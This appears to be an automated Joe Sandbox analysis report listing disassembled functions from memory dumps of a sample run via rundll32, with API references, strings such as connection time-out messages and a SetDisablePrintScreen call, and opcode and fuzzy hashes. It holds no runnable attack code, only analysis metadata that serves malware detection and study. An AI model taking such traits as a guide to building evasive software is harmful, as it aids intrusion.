Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: _strspn
String ID: /:#?!@{}[]\$'"^`*<>=;,+&()$%u.%u.%u.%u$0123456789abcdefABCDEF:.
API String ID: 3684824311-414481020
Opcode ID: 565f28a9ca38e478317319ada1700401603d1b1db208fca1d9000e8ce587c435
Instruction ID: 3c8d2dd7e5fafe942e72142d9de4cea3f2b1e781a8d2452d13383356e59c2a4d
Opcode Fuzzy Hash: 565f28a9ca38e478317319ada1700401603d1b1db208fca1d9000e8ce587c435
Instruction Fuzzy Hash: 00515975A0C3534BE720CF38D841B7BBBE49F8A348F55446EE98987242EA62D44987D3

Function 6CFF4CD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CFF4D42
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6CFF4D8E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6CFF4DAD
std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF4E42

Strings

bad locale name, xrefs: 6CFF4E5E

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: std::_$Locinfo::_Lockit$Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1143662833-1405518554
Opcode ID: 6df42c4f412f3c2d2acc74fa679394e80e15fa4c33118db7aba3ec9d9438ba7d
Instruction ID: cc050cf8340f4f2103021650935656aadc5fe588cd542c9494c84c6d7b081c26
Opcode Fuzzy Hash: 6df42c4f412f3c2d2acc74fa679394e80e15fa4c33118db7aba3ec9d9438ba7d
Instruction Fuzzy Hash: A9414CF1D052499BEF00CFA4D944BDEBFB8EF14218F148425E914AB790E7759605CBA1

Function 6D007210 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

Part of subcall function 6CFFEEC0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,6CFF9E6C,?,00000000,00000000,00000008,6CFF1FE0,00000000), ref: 6CFFEED3
Part of subcall function 6CFFEEC0: __alldvrm.LIBCMT ref: 6CFFEEED
Part of subcall function 6CFFEEC0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CFFEF14

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D00726A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0072C9

Strings

Connection %ld seems to be dead, xrefs: 6D007344
Too old connection (%ld seconds idle), disconnect it, xrefs: 6D007286, 6D00728D
Too old connection (%ld seconds since creation), disconnect it, xrefs: 6D0072E9, 6D0072F0

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery__alldvrm
String ID: Connection %ld seems to be dead$Too old connection (%ld seconds idle), disconnect it$Too old connection (%ld seconds since creation), disconnect it
API String ID: 3283211967-1280337241
Opcode ID: 47c9e95964638e006616eab9c129c42a142ac70387ae6e0e34acf1dfafba7930
Instruction ID: 0c6c1a086f90c52604a78701c53e52a52d2529b6783417385f64aeeccc33a242
Opcode Fuzzy Hash: 47c9e95964638e006616eab9c129c42a142ac70387ae6e0e34acf1dfafba7930
Instruction Fuzzy Hash: 7C314525F047417BF311667C4C41BFB73A8EFDA308F148528FA6897252EB6479C583A1

Function 04EE4D38 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 04EE4D7D
_memset.LIBCMT ref: 04EE4D9A
_memset.LIBCMT ref: 04EE4DD4
_memset.LIBCMT ref: 04EE4E33

Strings

D, xrefs: 04EE4E40

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$_strrchr
String ID: D
API String ID: 3722325190-2746444292
Opcode ID: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
Instruction ID: f11e421f9005d5ef4682380a1409018916f9fb80324354d0aa13e464cf5b6b2e
Opcode Fuzzy Hash: ce5fa5e08b36f509c4af0bf848edf5c17ea2ab9df625cf8cc3875fdae94e2d5c
Instruction Fuzzy Hash: E7410BB2900118ABEB10DB64DC89FFEB7B89F54708F004595E609A71C0DB71AB49CB61

Function 6D030310 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D030375
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D0303D1

Strings

gfff, xrefs: 6D03038F
Connection time-out, xrefs: 6D03033C
set timeouts for state %d; Total % I64d, retry %d maxtry %d, xrefs: 6D0303F0

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: Connection time-out$gfff$set timeouts for state %d; Total % I64d, retry %d maxtry %d
API String ID: 885266447-1150704995
Opcode ID: 69eeeaf72df21c4ec34ff13b256fa96cf45f9120db736531deae2c8d27616fc5
Instruction ID: bed375653d943cc9863cb488bced22a1b0cdb9496aba64ce9b4480a010146cd0
Opcode Fuzzy Hash: 69eeeaf72df21c4ec34ff13b256fa96cf45f9120db736531deae2c8d27616fc5
Instruction Fuzzy Hash: 2E2105B26097026BF7348E66CC40B6B769DFB81304F12093DF6458B280E776E9088790

Function 04EB1740 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 04EB1758

Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB2192
Part of subcall function 04EB217D: __CxxThrowException@8.LIBCMT ref: 04EB21A7
Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB21B8

std::_Xinvalid_argument.LIBCPMT ref: 04EB1776
std::_Xinvalid_argument.LIBCPMT ref: 04EB1791

Strings

invalid string position, xrefs: 04EB1753
string too long, xrefs: 04EB1771, 04EB178C

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw
String ID: invalid string position$string too long
API String ID: 4225265588-4289949731
Opcode ID: 5d4182acdae7301a530905490912af16b69fd05a15fd31543b5ac456d6d06ddf
Instruction ID: 952f5b72ad091f93fbab61daaaa6b6663ced843ec37c0db0c2228ca813b07cd8
Opcode Fuzzy Hash: 5d4182acdae7301a530905490912af16b69fd05a15fd31543b5ac456d6d06ddf
Instruction Fuzzy Hash: FA21A7327003149BD724DE6CE890AABF7E9AF967A4F205A6DE5D18B240D771F84187D0

Function 04EB29FE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04EB2A18

Part of subcall function 04EB375E: __FF_MSGBANNER.LIBCMT ref: 04EB3777
Part of subcall function 04EB375E: __NMSG_WRITE.LIBCMT ref: 04EB377E
Part of subcall function 04EB375E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3), ref: 04EB37A3

std::exception::exception.LIBCMT ref: 04EB2A4D
std::exception::exception.LIBCMT ref: 04EB2A67
__CxxThrowException@8.LIBCMT ref: 04EB2A78

Strings

bad allocation, xrefs: 04EB2A46

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID: bad allocation
API String ID: 615853336-2104205924
Opcode ID: 73dc123f90d8823c072d3f935a1f3b381c36003a6705dd4b40d6a204b64196fc
Instruction ID: fbc9ebf6652b4827aa7aa02cab643db9496a66cd78934533ee6694434e8e6b66
Opcode Fuzzy Hash: 73dc123f90d8823c072d3f935a1f3b381c36003a6705dd4b40d6a204b64196fc
Instruction Fuzzy Hash: 23F0F935500109ABEB15EBA4D90A9EF7BA4EF4071CF102459EAC9A6480DBB1BE06C7D1

Function 04EE1FD4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 04EE1FE7

Part of subcall function 04EE1F42: ___BuildCatchObjectHelper.LIBCMT ref: 04EE1F78

_UnwindNestedFrames.LIBCMT ref: 04EE1FFE
___FrameUnwindToState.LIBCMT ref: 04EE200C

Strings

csm, xrefs: 04EE1FE3, 04EE1FF8, 04EE200B, 04EE2029, 04EE2039
csm, xrefs: 04EE1FD6

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: 61fccba65a892d4c5528f1c92d5926e57caec4552de65b7ba8e5cb4297bc9a82
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: 0001F67140010ABBEF12AF52CC44EFABF6AEF08398F005014BD5815260DB76E9B1DBE1

Function 04EC2BCC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 04EC2BDF

Part of subcall function 04EC2B3A: ___BuildCatchObjectHelper.LIBCMT ref: 04EC2B70

_UnwindNestedFrames.LIBCMT ref: 04EC2BF6
___FrameUnwindToState.LIBCMT ref: 04EC2C04

Strings

csm, xrefs: 04EC2BDB, 04EC2BF0, 04EC2C03, 04EC2C21, 04EC2C31
csm, xrefs: 04EC2BCE

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: 4f154f097e3b4ac0f6f2db0752f5cb1dd4f97f5add976d65f11fddf64965deac
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: 5501FB7580110ABBDF125F51CE44EEB7F6AFF14358F009058BE1815160DB36E972EBA5

Function 6D06400E Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6D064093
__alloca_probe_16.LIBCMT ref: 6D06415C
__freea.LIBCMT ref: 6D0641C3

Part of subcall function 6D05F83C: HeapAlloc.KERNEL32(00000000,6D06717F,?,?,6D06717F,00000220,?,?,?), ref: 6D05F86E

__freea.LIBCMT ref: 6D0641D6
__freea.LIBCMT ref: 6D0641E3

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: d370fba04683a53934e0bfd38848d4a769b3a7caa6febc866f3da805db98e089
Instruction ID: d630be3b9e3c55f2cb1a09954a877e842bf27974777b943d3af981960c1b7ea4
Opcode Fuzzy Hash: d370fba04683a53934e0bfd38848d4a769b3a7caa6febc866f3da805db98e089
Instruction Fuzzy Hash: B351AA76608296BAFB118E649C90FBB3AE9EF99354B124029FE14DB150EB30DD1186B0

Function 6D04CA9A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(6D086840,00000010,6D04CC0C,?,?,?,?,6D086860,00000008,6D04CC90,?,?,?,00000000), ref: 6D04CAF9
___AdjustPointer.LIBCMT ref: 6D04CB61
___AdjustPointer.LIBCMT ref: 6D04CB84
___AdjustPointer.LIBCMT ref: 6D04CC20

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: AdjustPointer$DisablePrintScreen@@
String ID:
API String ID: 737270400-0
Opcode ID: 3461555e6cd5c17eee4e570302f56f7c45a6b30c9b367c9812641add46113543
Instruction ID: 47bd28f15f8e4c19ef704432790c7232becca150f6451645405e74019ff8535e
Opcode Fuzzy Hash: 3461555e6cd5c17eee4e570302f56f7c45a6b30c9b367c9812641add46113543
Instruction Fuzzy Hash: 1151BD72608606EFFB1A8F14D950FBA73A4EF41314F10C53DE91657290EB32E868C798

Function 04EB2E7F Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04EB2EDA
_memcpy_s.LIBCMT ref: 04EB2F4B
__read.LIBCMT ref: 04EB2FAE
__filbuf.LIBCMT ref: 04EB2FCA

Part of subcall function 04EB5C8C: __getptd_noexit.LIBCMT ref: 04EB5C8C

_memset.LIBCMT ref: 04EB300B

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
Instruction ID: f6616ee3965e714eb7d3ff077d13b029f160d2891c0fbecd3a31a6c278b31323
Opcode Fuzzy Hash: 85830fdd0532c69352a8dafae8a1de59cb1b951ebad45c523fb0a824246297a3
Instruction Fuzzy Hash: 4551E531A00605EBDB258F698C886DFB7B1AF40328F1496A9E9A5A61D0D370BA50DFD0

Function 04ED2327 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 04ED2382
_memcpy_s.LIBCMT ref: 04ED23F3
__read.LIBCMT ref: 04ED2456
__filbuf.LIBCMT ref: 04ED2472

Part of subcall function 04ED4F6B: __getptd_noexit.LIBCMT ref: 04ED4F6B

_memset.LIBCMT ref: 04ED24B3

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 1139bd14f2385309b5177e518c66b7e8130fb7077004a34db1f1c8364b1a048a
Instruction ID: 6e31363da7e3806ae1e51b48ca5f16d6eaf5240aacb80e221d4dc49435bf7751
Opcode Fuzzy Hash: 1139bd14f2385309b5177e518c66b7e8130fb7077004a34db1f1c8364b1a048a
Instruction Fuzzy Hash: DE51E430E00205EFDF248F79C8446AEB7B1AF40328F14A6E9EE25961D0E771BA53DB51

Function 6D05B02C Relevance: 7.6, APIs: 5, Instructions: 143pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,6D05B2B1,00000000,?), ref: 6D05B04E
GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6D05B2B1,00000000), ref: 6D05B0A8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6D05B2B1,00000000,?,?,00000000,?,?), ref: 6D05B136
__dosmaperr.LIBCMT ref: 6D05B13D
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6D05B2B1), ref: 6D05B17A

Part of subcall function 6D05B42A: __dosmaperr.LIBCMT ref: 6D05B45F

Memory Dump Source

Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true

Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: e457b86ccc9b346e395b5da6ae0cbd9ec2fe9b593f5d682d975d9e14e2fce8d2
Instruction ID: e2306b63fbb66706feab89d5f0edf43c242569fd1b035b0ba4b9b0e65d3bc279
Opcode Fuzzy Hash: e457b86ccc9b346e395b5da6ae0cbd9ec2fe9b593f5d682d975d9e14e2fce8d2
Instruction Fuzzy Hash: D4415A75904204AFEB64DFB5D944BAFBBF9FF89300B408929F956D3610E730A850CB64

Function 04EC5690 Relevance: 7.6, APIs: 6, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d24d9c685bf5b4dbd580062a2e91314c97e85e2f5f625a6a40c1adc58649775
Instruction ID: e95f4d5b39bc3c8c27bdfbed3b16239f40e5d485f4df634927c17efa741524db
Opcode Fuzzy Hash: 2d24d9c685bf5b4dbd580062a2e91314c97e85e2f5f625a6a40c1adc58649775
Instruction Fuzzy Hash: 9831A0B1700210AFEB20DF68DD81B6A77A9EF88759F045569FA08C7241E6B5F8028B94

Function 04EB359D Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 04EB35AB

Part of subcall function 04EB375E: __FF_MSGBANNER.LIBCMT ref: 04EB3777
Part of subcall function 04EB375E: __NMSG_WRITE.LIBCMT ref: 04EB377E
Part of subcall function 04EB375E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,04EB750C,00000000,00000001,00000000,?,04EBB043,00000018,04ECC790,0000000C,04EBB0D3), ref: 04EB37A3

_free.LIBCMT ref: 04EB35BE

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 2c385113fa97b2a1a296580e8f0979442f60fd02d5576f79f99ba72dbf5bc20b
Instruction ID: 7bcd084ee2f65d69105c5ef7a55f4cacd50cb00799475ceb0e3ccebec71c9f6d
Opcode Fuzzy Hash: 2c385113fa97b2a1a296580e8f0979442f60fd02d5576f79f99ba72dbf5bc20b
Instruction Fuzzy Hash: 6411E732905611FBDF226F75A8056EB3695AF4026DB126535ECC89B291EF34B8408BD4

Function 04EC5220 Relevance: 7.6, APIs: 5, Instructions: 51memoryCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00000000,04EC57AA,?,?,?,1CA2304D), ref: 04EC525F
_free.LIBCMT ref: 04EC526C
VirtualFree.KERNEL32(?,00000000,00008000,00000000,04EC57AA,?,?,?,1CA2304D), ref: 04EC5283
GetProcessHeap.KERNEL32(00000000,00000000,00000000,04EC57AA,?,?,?,1CA2304D), ref: 04EC528C
HeapFree.KERNEL32(00000000,?,?,?,1CA2304D), ref: 04EC5293

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: Free$Heap$LibraryProcessVirtual_free
String ID:
API String ID: 3953351234-0
Opcode ID: 8fe3c341df2abe99d99453acdd8a36772e8e924bbb5ae47897c4597ed1d5127b
Instruction ID: 17ee9df26c2bbf89d9e41af52eb87a3cf15d0b55cff2a4a136fa4fae46702acd
Opcode Fuzzy Hash: 8fe3c341df2abe99d99453acdd8a36772e8e924bbb5ae47897c4597ed1d5127b
Instruction Fuzzy Hash: 11016DB1600B10ABC734CF6AC984E57B3F9FBC5712B149A2DE5AA87284D734F842CB50

Function 04EB866D Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04EB8679

Part of subcall function 04EB4838: __getptd_noexit.LIBCMT ref: 04EB483B
Part of subcall function 04EB4838: __amsg_exit.LIBCMT ref: 04EB4848

__getptd.LIBCMT ref: 04EB8690
__amsg_exit.LIBCMT ref: 04EB869E
__lock.LIBCMT ref: 04EB86AE
__updatetlocinfoEx_nolock.LIBCMT ref: 04EB86C2

Memory Dump Source

Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true

Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 31eb67969934a021dbdd5c84c87488c9c0c77d28489ad4fce8eeef9ce5042a65
Instruction ID: 2d4eb84f522d79634dde29d8faa5f1031013c39ee95a1773efdc40a3ce013fff
Opcode Fuzzy Hash: 31eb67969934a021dbdd5c84c87488c9c0c77d28489ad4fce8eeef9ce5042a65
Instruction Fuzzy Hash: C1F06D32944704DBEB21BB6898057DF26A4BF0072DF516D59E8D0AA2D4CB7478418BDA

Function 04ED9B23 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 04ED9B2F

Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0

__getptd.LIBCMT ref: 04ED9B46
__amsg_exit.LIBCMT ref: 04ED9B54
